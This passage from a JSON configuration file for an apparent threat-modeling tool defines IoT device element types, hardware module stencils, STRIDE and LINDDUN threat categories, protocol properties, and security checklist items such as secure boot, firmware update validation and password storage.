Supply","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51},{"ID":"e75f9804-6ae3-4eb6-9011-4b87a0d4823b","Name":"Wired Power Supply","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Is Pluggable ","ID":"cef5bbac-5833-49bb-9021-9f5200c29c83","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":51},{"ID":"5f755466-4417-4060-83de-64bddeabd1ba","Name":"Car Battery","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty3","Value":true}]},{"ID":"4b7a61d0-c430-48ea-8730-03a81542a5d8","Name":"Microphone","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51},{"ID":"210ba217-67da-4bda-9063-3c95716eb5b9","Name":"Loudspeaker","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51},{"ID":"c2d71a11-6228-4e05-bc93-0ddd45328fde","Name":"Camera","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Can Record Humans","ID":"38883a00-d18f-4d1f-8a4c-18741a480557","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Has Gesture Recognition","ID":"d9919a71-0642-46a5-8056-348e06f8b86e","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ElementTypeID":51},{"ID":"5deb66fa-ff3e-49b6-b0d2-66a39708d259","Name":"Motor","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty1","Value":false},{"Key":"NewProperty3","Value":true}]},{"ID":"2d7223ec-7361-4f2a-bfea-d6c437e9a4f4","Name":"Key File","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Is Encrypted","ID":"5fccd43c-b3f0-405a-bfcc-8d2bb73bdd9e","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ElementTypeID":21},{"ID":"59076fab-74e3-415a-93f5-fffd12e3d79c","Name":"Web Server","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":11},{"ID":"ed2c7ab5-2fbf-44fc-83b1-d06b38e861f3","Name":"User","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":32},{"ID":"2ca5ca37-5df9-4b94-ad56-b383c1f7be40","Name":"Bluetooth","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":41,"PropertyOverwrites":[{"Key":"ProtocolStack","Value":["f805dd78-eac2-4967-8dfc-231605a75ace"]}]},{"ID":"0a168b12-fc9a-411c-bbf0-59599d0181f8","Name":"Cloud Service","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":11},{"ID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","Name":"Authentication","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":11},{"ID":"6f4e4f07-79e0-4f16-b447-dbc325b42e91","Name":"Cloud Service","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":31},{"ID":"de170dec-af60-4cc7-8daf-946b3fa53132","Name":"RFID","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Has EPC","ID":"355ded09-e3ae-41f7-8bbb-3fa0870e35a6","Tooltip":"Has Electronic Product Code (EPC)","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":61,"templateDFDID":"090e631e-a7e9-43be-9f36-e03da6e8e5c0"},{"ID":"840b5bd1-b250-427c-bf56-5ddf826382ff","Name":"GPS","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61,"templateDFDID":"0981c2a9-a7a2-4497-b60e-076a7bfa8860"},{"ID":"7edf2806-e7a8-4a26-b1cf-2a3de3d41b53","Name":"Modbus","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61},{"Name":"Profibus","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"b7057a19-76b2-4cf5-9d7a-e3335079fa5f","templateDFDID":"0d96e10f-fddd-4855-9efa-e2480847866a"},{"ID":"60eaa240-6b5f-4c62-b33f-77c772c9375a","Name":"Profinet","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61}],"stencilTypeTemplates":[{"ID":"943f0836-0524-46a0-b495-9e5dc5c8f39e","Name":"Microcontroller","Description":"","stencilTypeIDs":["8bd42f0c-a4d2-4d98-9dcb-b9b100114fa5","69401648-0084-45ca-b984-505173c9cdb1","4409e854-5f53-4e7e-bee5-232c0e27fb40","cf7355d0-6f0c-4ad8-afa2-8689a81e28b8","361cf331-bd80-413d-835a-ac900f091906"],"ListInHWDiagram":true,"ListInElementTypeIDs":[12,72],"Layout":[{"x":20,"y":40,"canEditSize":false,"width":340,"height":250,"name":"Microprocessor"},{"x":180,"y":40,"canEditSize":false,"width":0,"height":0,"name":"SRAM"},{"x":20,"y":135,"canEditSize":false,"width":0,"height":0,"name":"FLASH"},{"x":180,"y":135,"canEditSize":false,"width":0,"height":0,"name":"JTAG"},{"x":0,"y":0,"canEditSize":true,"width":340,"height":250,"name":"Chip"}],"CanEditInWhichDiagram":true},{"ID":"ffd00d05-c506-4bf9-af35-0b0f56234515","Name":"CAN Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"CAN Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"CAN Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"CAN Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"054dd0d3-961a-4f18-9aee-92ac1b515392","Name":"USB Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"USB Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"USB Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"USB Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"0d2497f5-d83a-44ac-91ca-6453a7a0e2b4","Name":"SPI Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"SPI Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"SPI Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"SPI Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"5135733f-bcb2-459e-a84b-048c832f5616","Name":"RF Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"RF Module Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"RF Module Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"RF Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"1ad7afbf-59a5-41ec-905e-621602e17ea6","Name":"WiFi Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"WiFi Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"WiFi Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"WiFi Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"f6abd33c-f527-4621-9a09-1ee5466aee01","Name":"Bluetooth Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"Bluetooth Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"Bluetooth Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"Bluetooth Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"0d96e10f-fddd-4855-9efa-e2480847866a","Name":"PROFIBUS Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"PROFIBUS Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"PROFIBUS Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"PROFIBUS Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"090e631e-a7e9-43be-9f36-e03da6e8e5c0","Name":"RFID Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"RFID Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"RFID Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"RFID Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"0981c2a9-a7a2-4497-b60e-076a7bfa8860","Name":"GPS Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"GPS Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"GPS Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"GPS Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"fad91fd1-0a2b-4ab0-a069-5362948e5f47","Name":"Ethernet Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"Ethernet Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"Ethernet Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"Ethernet Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true}],"stencilThreatMnemonics":[{"ID":"c262c90f-3076-43f2-8de3-0cada1f881cd","Name":"STRIDE","Description":"","Letters":[{"Name":"Spoofing","Letter":"S","Description":"Threat against the security goal authenticity","AffectedElementTypes":[11,12,31,32,51],"threatCategoryID":"3bbe354c-317a-4f76-bdbb-75543b5d5aa4","ID":"89012bfb-6c3e-465b-aa8c-31e41614968f"},{"Name":"Tampering","Letter":"T","Description":"Threat against the security goal integrity","AffectedElementTypes":[11,12,21,22,72,41,51,61],"threatCategoryID":"f0e814f3-b3d2-4357-b155-8fffd70ec42e","ID":"b09d9704-9868-446d-a6a6-f91761d223ef"},{"Name":"Repudiation","Letter":"R","Description":"Threat against the security goal Non-repudiation","AffectedElementTypes":[11,12,31,32],"threatCategoryID":"a77f314c-f74e-4340-a993-5a1a24f26db4","ID":"111e4a03-1420-4cc4-8a8c-b649258851f0"},{"Name":"Information Disclosure","Letter":"I","Description":"Threat against the security goal confidentiality","AffectedElementTypes":[11,12,21,22,41,51,61],"threatCategoryID":"369640cc-1b53-4a2e-9e3b-a74c187e68e7","ID":"1da5e6cb-43b9-4fbb-acaa-5437d658bf31"},{"Name":"Denial of Service","Letter":"D","Description":"Threat against the security goal availability","AffectedElementTypes":[11,12,21,22,41,51,61],"threatCategoryID":"422b9042-212d-4467-a000-2528a2e09f8b","ID":"4cb90c1b-9c46-4666-99ff-151e3f7fb122"},{"Name":"Elevation of Privilege","Letter":"E","Description":"Threat against the security goal authorization","AffectedElementTypes":[11,12],"threatCategoryID":"8687e614-c127-418b-8fda-536bb2f0708f","ID":"7ab5111c-e480-41e6-9c6d-0c48433fac72"}]},{"ID":"1e834e57-12f5-4679-8027-434d1e5812a2","Name":"LINDDUN","Description":"https://www.linddun.org/linddun","Letters":[{"Name":"Linkability","Letter":"L","Description":"An adversary is able to link two items of interest without knowing the identity of the data subject(s) involved.","AffectedElementTypes":[11,21,31,41,51,61,32,22,12],"threatCategoryID":"55379fba-d815-4e29-bd4b-9aa674ed6821","ID":"dc68752a-08bc-4359-858d-b84ad3ede975"},{"Name":"Identifiability","Letter":"I","Description":"An adversary is able to identify a data subject from a set of data subjects through an item of interest. \u200b","AffectedElementTypes":[11,21,31,41,51,61,32,22,12],"threatCategoryID":"5278c995-f9d9-410e-b012-2995ba30c353","ID":"2062fc21-5b59-44a5-9ba2-88bdf22710a7"},{"Name":"Non-Repudiation","Letter":"N","Description":"The data subject is unable to deny a claim (e.g., having performed an action, or sent a request).","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"700f5437-7d03-4bff-a0e6-50cfb82dc0e5","ID":"c1d68de4-a522-4cf8-8f95-501b2f422498"},{"Name":"Detectability","Letter":"D","Description":"An adversary is able to distinguish whether an item of interest about a data subject exists or not, regardless of being able to read the contents itself.","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"b98738a0-f79e-4b1e-86df-0e716eb61bc0","ID":"b96ae216-002a-48fd-97b2-5807ea74f696"},{"Name":"Disclosure of Information","Letter":"D","Description":"An adversary is able to learn the content of an item of interest about a data subject.","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"da86b5fc-d15d-41f7-a98f-01fe5e143651","ID":"22de5b16-e0db-43b6-9a80-2618e3848f88"},{"Name":"Unawareness","Letter":"U","Description":"The data subject is unaware of the collection, processing, storage, or sharing activities (and corresponding purposes) of the data subject\u2019s personal data.","AffectedElementTypes":[31,32],"threatCategoryID":"aead4d1d-0f64-42b4-a512-cbbc979af3ca","ID":"10cdb2c2-e4ec-4d88-86a8-934339f84ed8"},{"Name":"Non-Compliance","Letter":"N","Description":"The processing, storage, or handling of personal data is not compliant with legislation, regulation, and/or policy.","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"2521b219-3d43-4fd8-bf96-d658eea44d01","ID":"24a57fc5-2005-4867-8c56-b1a96ea38be9"}]},{"ID":"40ae1e0b-e25a-4285-a580-3f2d68d6cb75","Name":"Safety & Privacy","Description":"","Letters":[{"Name":"Safety","Letter":"S","Description":"Threats threatening the safety of operation, humans, and machines","AffectedElementTypes":[51,41,32],"threatCategoryID":"17a04fbd-365f-4345-97f8-88d3c7382ec1","ID":"df1e858e-538b-4f26-b6e1-ea7813e63d3d"},{"Name":"Privacy","Letter":"P","Description":"Threats threatening the privacy","AffectedElementTypes":[51,11,21,22,12,41],"threatCategoryID":"7bbfe5d3-8a91-4210-99ab-79f670715e61","ID":"5ae41943-50b7-46c3-acbb-97c70e085c39"}]}],"protocols":[{"ID":"5c833fba-2a5b-4d15-bc48-f4a6e74ddc27","Name":"Protocol","Description":"","IsDefault":true,"Properties":[{"DisplayName":"Provides Confidentiality","ID":"ProvidesConfidentiality","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Provides Integrity","ID":"ProvidesIntegrity","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Provides Sender Authenticity","ID":"ProvidesSenderAuthenticity","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Provides Receiver Authenticity","ID":"ProvidesReceiverAuthenticity","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}]},{"ID":"857c7b5e-e034-41f8-9b60-ee11aa9771f1","Name":"HTTP","Description":"","IsDefault":false,"Properties":[]},{"ID":"21731335-5e66-455c-9b6a-6796ac85577a","Name":"HTTPS","Description":"","IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"New Property2","Value":true},{"Key":"New Property1","Value":true},{"Key":"ProvidesConfidentiality","Value":true},{"Key":"ProvidesIntegrity","Value":true},{"Key":"ProvidesReceiverAuthenticity","Value":true}]},{"ID":"f805dd78-eac2-4967-8dfc-231605a75ace","Name":"Bluetooth","Description":"","IsDefault":false,"Properties":[]},{"ID":"c4ce892e-975c-48f5-a0f8-e6eb7591111d","Name":"Proprietary Protocol","Description":"","IsDefault":false,"Properties":[]}],"myComponentSWTypes":[{"ID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Name":"Operating System","Description":"","ComponentTypeID":1,"IsActive":true,"IsThirdParty":true,"Properties":[{"DisplayName":"Has Only Required Components","ID":"a7e3fa91-ce20-42b3-8e35-e0188ca1ac50","Tooltip":"Does the operating system only include components (libraries, modules, packages, ...) that are required to support the function of the device?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Latest OS Version","ID":"4ba05121-485a-40eb-832a-f4095c7b88df","Tooltip":"Is the OS the latest available stable version?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Secure Config Is Default","ID":"41b3d476-6ff9-40d7-ad5b-c5d5fad4cda1","Tooltip":"Does the device ship with the most secure configuration in place (security by default)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Component Update Process","ID":"36ed4680-0b94-42a9-9863-08eb976c9ebc","Tooltip":"Is there a process to update OS components to the latest stable version throughout the lifetime of a deployed device?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Activated Ports","ID":"fb3b36de-11b3-4e5d-9c9c-4dcfab666da6","Tooltip":"Are all ports, protocols, and services that are not used deactivated?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Root Access Restricted","ID":"c93fbf95-01d7-45fb-a786-0eb926e6dc2c","Tooltip":"Is the access to the root file system restricted for users/applications?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Follows Least Privilege Principal","ID":"7378780b-e280-4494-84f2-0beb4e7257ec","Tooltip":"Have all files and directories the minimum required access rights (least privilege principal)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"File System Is Encrypted ","ID":"85e19877-51a0-4904-8e98-b2fb14be3922","Tooltip":"Is the file system encrypted?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Name":"Trusted Computing Base","Description":"See section C and M of https://www.iotsecurityfoundation.org/wp-content/uploads/2019/12/Best-Practice-Guides-Release-2_Digitalv3.pdf\\nand section 6.1 of https://www.gsma.com/iot/wp-content/uploads/2020/05/CLP.13-v2.2-GSMA-IoT-Security-Guidelines-for-Endpoint-Ecosystems.pdf","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Secure Boot","ID":"4f0c5fb9-e24f-487a-b192-66d10c2b97a5","Tooltip":"Does the device implement a secure boot?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Root Of Trust","ID":"17b59f51-59d3-4a8f-9960-a04ce7e96be6","Tooltip":"Does the device has a immutable Root Of Trust in hardware?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Proper Boot Order","ID":"eb678bc0-3ece-4937-bba3-03981c5759a4","Tooltip":"Does the device boot the next stage only after the successful boot of the previous stage? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Checks Immediately Before Execution","ID":"f3697413-e4de-4572-90b1-8041e8ff9b67","Tooltip":"Is code checked for validity and trust immediately before running the code (to reduce Time of Check to Time of Use attacks)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Boot Code Protection in RAM","ID":"885834f4-b8b6-485b-8690-6ac525dbb59d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Trusted Execution Environment","ID":"22e9ef37-20a4-4b6c-ba68-ecc90f1d152f","Tooltip":"Does the Trusted Computing Base utilize a Trusted Execution Environment for isolation of critical operations?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Isolates Cryptographic Operations","ID":"28c99516-8651-452e-86f7-ce00df632c8d","Tooltip":"Are cryptographic operations (encryption, message signing, key exchange, key storage) performed by the Trusted Computing Base?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Name":"Firmware Update","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Is Updatable","ID":"367b80cd-1b41-483b-a157-b143714b8af7","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Prevents Roll-Back","ID":"d951b792-f84b-4ab3-82d1-21867e202755","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Validating Integrity","ID":"8f47a4ac-0934-4a65-a6f3-07503c92f658","Tooltip":"Does the update routine cryptographically validate the integrity of a software update package before the installation begins?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Validating Authenticity","ID":"00f961fc-97ce-4003-8f2e-79a4748ec0b2","Tooltip":"Does the update routine cryptographically validate the authenticity of a software update package before the installation begins?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Allows TOCTOU attack","ID":"000441ff-d15f-46c3-bb9c-0c949063271d","Tooltip":"Does the system ensure that the package cannot be modified or replaced by an attacker between being validated and installed - a TOCTOU (Time of Check to Time of Use) attack?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Fail Safe Mechanism","ID":"3df6a845-52a2-40a9-8978-0277efd7cfcb","Tooltip":"Does the system implement a fail safe mechanism that will leave the system in a known safe state in the event of a failed update?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Encrypted","ID":"434d79b2-574c-4575-813b-19ec7854a139","Tooltip":"Is the firmware update encrypted?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"838f741c-120e-4b73-951a-d55a11d36ca4","Name":"Cryptography","Description":"","ComponentTypeID":1,"IsActive":true,"IsThirdParty":true,"Properties":[{"DisplayName":"Uses Risky Cryptographic Algorithm ","ID":"783c742d-ebbf-4a58-b8c9-bdc0faeff57d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Allows Downgrade","ID":"56a10ad5-a9bf-426f-8e83-ba07561ca78b","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Weak Block Cipher Mode","ID":"518bbb50-aeee-4c87-95d1-8724a4dac569","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Appropriate Parameters","ID":"08377961-8f56-4b56-b684-331f77810f1d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Sufficient Entropy","ID":"420f03a2-1ab7-4bc2-910d-4ea025518da2","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Reuses Nonces","ID":"f35ccff8-6497-4b28-8627-7f255bce0e02","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Implements PFS","ID":"6cce79b8-3df2-4eda-8892-e83b6a2ee603","Tooltip":"Is Perfect Forward Secrecy (PFS) implemented whenever possible/required?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Name":"Authentication","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Hard-Coded Credentials","ID":"e1e92ae3-ee61-4cae-bfb5-be18e97ea587","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Default Credentials","ID":"714ed1de-855c-491b-8a08-745a99e17413","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Password Requirements","ID":"540e39da-3227-4e6c-86ea-32a017318511","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Multi-Factor Authentication","ID":"88763e20-7878-4525-81d8-c4d09b867042","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Restriction of Attempts","ID":"aa74f499-b995-4f5e-8d92-91f3ca172743","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Session ID Expiration","ID":"51473250-3891-4342-a8b8-687db16ffef3","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Session Timeout","ID":"a21a6894-256f-4bfd-bd49-09352d054399","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Strong Password Recovery","ID":"a9b6390d-0145-4e0f-8420-8a9b8f728c3d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Client-side Hashing","ID":"ba8dc5f0-e1a9-4263-8179-747791b873ee","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Exposes Sensitive Information","ID":"157fd588-2ea2-4260-9a25-86bf8241b31c","Tooltip":"Does an authentication response contain information which requirement is not fulfilled (e.g. password/username is wrong)? ","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","Name":"Error Handling","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Handles All Exceptions","ID":"897ef1fd-f1e7-4527-89e3-2cdaf2c8644a","Tooltip":"Can unhandled exceptions occur?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Exposes Sensitive Info","ID":"f7733c50-2529-459f-9397-8d06f231121c","Tooltip":"Do error messages reveal details about the internal state (e.g. stack information, path, passwords)?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","Name":"Device Management","Description":"","ComponentTypeID":1,"Properties":[{"DisplayName":"Device Has Tamper Resistant Unique ID","ID":"08ee42e8-3525-4767-98e3-f7492f356d2f","Tooltip":"Is the device uniquely identifiable (the ID is factory-set and tamper resistant stored in hardware)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Secure Management Access","ID":"6962d897-bf88-4745-9f2c-a8aa9d981f93","Tooltip":"Is the access for device management secured (unique password/certificate, MFA, etc.)?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Name":"User Management","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Unique User IDs","ID":"6391f8f2-eb04-4caf-b490-49c920315867","Tooltip":"Are users identified by a unique identifier? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Enables Different Privileges","ID":"cdb65d33-946e-412e-838b-3075e928c4f0","Tooltip":"Is it possible to assign different privileges to users?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Stores Passwords Properly","ID":"984400a6-7bd6-4031-a40c-06f0499e0d86","Tooltip":"Are passwords stored properly (using a cryptographic hash function along with a unique unpredictable salt)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Removes User Data on Reset","ID":"e6ee6f25-6e52-4f43-93c4-7ef35eb97024","Tooltip":"Does a factory reset remove all user data/credentials stored on the device?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"02b94aae-efea-451e-a017-81be68db03d7","Name":"Log Management","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Complies to Data Protection Regulations","ID":"4006de15-8767-4a09-8678-84b8d6b50ae0","Tooltip":"Do all logged data comply with prevailing data protection regulations?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Restricts Access","ID":"8e4b2af8-b023-4991-80f5-54ffa28cd616","Tooltip":"Is access to log files restricted to the minimum required rights to function properly?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Implements Log Rotation","ID":"d0532ce9-51a9-4bb1-84ae-c8c63ee78e7f","Tooltip":"Is there a maximum size for logs and is log rotating implemented?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Evaluates Logs","ID":"364003cb-3e6c-470a-a6bf-e7a7c93e07fa","Tooltip":"Are logs regularly monitored and analyzed to extract valuable information and insight?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Stores Logs Separately","ID":"418fe90d-88fd-4066-9339-890501ea07f0","Tooltip":"Are logs stored in their own partition, separate from other system files?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Central Log 